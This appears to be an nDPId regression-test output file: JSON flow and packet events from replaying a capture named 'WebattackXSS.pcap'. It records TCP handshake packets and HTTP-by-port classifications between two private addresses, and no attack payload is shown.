+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347266097,"flow_last_seen":1499347271692,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55362,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347266097,"flow_last_seen":1499347271692,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55362,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347267376,"flow_last_seen":1499347272693,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55376,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347267376,"flow_last_seen":1499347272693,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55376,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347268659,"flow_last_seen":1499347273693,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55390,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347268659,"flow_last_seen":1499347273693,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55390,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3567,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347395736,"flow_last_seen":1499347395736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347395736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56738,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3567,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":1,"flow_last_seen":1499347395736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347395736,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86QJAAD4G3M2sEAABwKgKMt2iAFAP0mDzAAAAAKACchCFIAAAAgQFtAQCCAoBOonxAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3568,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":2,"flow_last_seen":1499347395736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347395736,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3aKdN8ZwD9Jg9KAScSDDCwAAAgQFtAQCCAoD5FtnATqJ8QEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3569,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":3,"flow_last_seen":1499347395737,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347395737,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06QNAAD4G3NSsEAABwKgKMt2iAFAP0mD0nTfGcYAQAOViEgAAAQEICgE6ifID5Ftn"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3582,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347398258,"flow_last_seen":1499347398258,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347398258,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56764,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3582,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":1,"flow_last_seen":1499347398258,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347398258,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8RfFAAD4Gf9+sEAABwKgKMt28AFBXE8mZAAAAAKACchDSpwAAAgQFtAQCCAoBOoxoAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3583,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":2,"flow_last_seen":1499347398258,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347398258,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3byK2p7LVxPJmqAScSBIHgAAAgQFtAQCCAoD5F3eATqMaAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3584,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":3,"flow_last_seen":1499347398259,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347398259,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0RfJAAD4Gf+asEAABwKgKMt28AFBXE8maitqezIAQAOXnJQAAAQEICgE6jGgD5F3e"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3595,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347399514,"flow_last_seen":1499347399514,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347399514,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56778,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3595,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":1,"flow_last_seen":1499347399514,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347399514,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8gr5AAD4GQxKsEAABwKgKMt3KAFDFpQ8cAAAAAKACchAdSwAAAgQFtAQCCAoBOo2iAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3596,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":2,"flow_last_seen":1499347399514,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347399514,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3cp+0BfYxaUPHaAScSAkhQAAAgQFtAQCCAoD5F8YATqNogEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3597,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":3,"flow_last_seen":1499347399515,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347399515,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0gr9AAD4GQxmsEAABwKgKMt3KAFDFpQ8dftAX2YAQAOXDjAAAAQEICgE6jaID5F8Y"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3608,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347400752,"flow_last_seen":1499347400752,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347400752,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56792,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3608,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":1,"flow_last_seen":1499347400752,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347400752,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8pCxAAD4GIaSsEAABwKgKMt3YAFC0oCr7AAAAAKACchARLgAAAgQFtAQCCAoBOo7XAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3609,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":2,"flow_last_seen":1499347400752,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347400752,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3diBtZGUtKAq\/KAScSCakQAAAgQFtAQCCAoD5GBNATqO1wEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3610,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":3,"flow_last_seen":1499347400753,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347400753,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0pC1AAD4GIausEAABwKgKMt3YAFC0oCr8gbWRlYAQAOU5mAAAAQEICgE6jtgD5GBN"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347403327,"flow_last_seen":1499347403327,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347403327,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56818,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":1,"flow_last_seen":1499347403327,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347403327,"pkt":"ABm5CmnxAMGxFOsxCABFAAA89cJAAD4G0A2sEAABwKgKMt3yAFCprWSZAAAAAKACchDf5AAAAgQFtAQCCAoBOpFbAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3627,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":2,"flow_last_seen":1499347403327,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347403327,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3fKtl6seqa1kmqAScSAhWAAAAgQFtAQCCAoD5GLRATqRWwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3628,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":3,"flow_last_seen":1499347403328,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347403328,"pkt":"ABm5CmnxAMGxFOsxCABFAAA09cNAAD4G0BSsEAABwKgKMt3yAFCprWSarZerH4AQAOXAXwAAAQEICgE6kVsD5GLR"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3638,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347404575,"flow_last_seen":1499347404575,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347404575,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56832,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3638,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":1,"flow_last_seen":1499347404575,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347404575,"pkt":"ABm5CmnxAMGxFOsxCABFAAA871lAAD4G1nasEAABwKgKMt4AAFBz\/X3KAAAAAKACchD7HQAAAgQFtAQCCAoBOpKTAAAAAAEDAwc="} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3639,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":2,"flow_last_seen":1499347404575,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347404575,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3gCf5c\/zc\/19y6AScSAkNgAAAgQFtAQCCAoD5GQJATqSkwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3641,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":3,"flow_last_seen":1499347404576,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347404576,"pkt":"ABm5CmnxAMGxFOsxCABFAAA071pAAD4G1n2sEAABwKgKMt4AAFBz\/X3Ln+XP9IAQAOXDPQAAAQEICgE6kpMD5GQJ"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347271162,"flow_last_seen":1499347276694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347404726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55416,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347271162,"flow_last_seen":1499347276694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347404726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55416,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347272469,"flow_last_seen":1499347277695,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347404726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55430,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347272469,"flow_last_seen":1499347277695,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347404726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55430,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347273742,"flow_last_seen":1499347279695,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347404726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55444,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347273742,"flow_last_seen":1499347279695,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347404726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55444,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347276278,"flow_last_seen":1499347281695,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347404726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55470,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347276278,"flow_last_seen":1499347281695,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347404726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55470,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347277521,"flow_last_seen":1499347282696,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347404726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55484,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347277521,"flow_last_seen":1499347282696,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347404726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55484,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3659,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347407100,"flow_last_seen":1499347407100,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347407100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56858,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3659,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":257,"flow_packet_id":1,"flow_last_seen":1499347407100,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347407100,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8oV1AAD4GJHOsEAABwKgKMt4aAFCK7TRXAAAAAKACchArEAAAAgQFtAQCCAoBOpUKAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3660,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":257,"flow_packet_id":2,"flow_last_seen":1499347407100,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347407100,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3hoI+EKiiu00WKAScSB18AAAAgQFtAQCCAoD5GaAATqVCgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3661,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":257,"flow_packet_id":3,"flow_last_seen":1499347407101,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347407101,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0oV5AAD4GJHqsEAABwKgKMt4aAFCK7TRYCPhCo4AQAOUU9wAAAQEICgE6lQsD5GaA"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3668,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347408367,"flow_last_seen":1499347408367,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347408367,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56872,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3668,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":258,"flow_packet_id":1,"flow_last_seen":1499347408367,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347408367,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8lz9AAD4GLpGsEAABwKgKMt4oAFBdawF4AAAAAKACchCKJgAAAgQFtAQCCAoBOpZHAAAAAAEDAwc="} 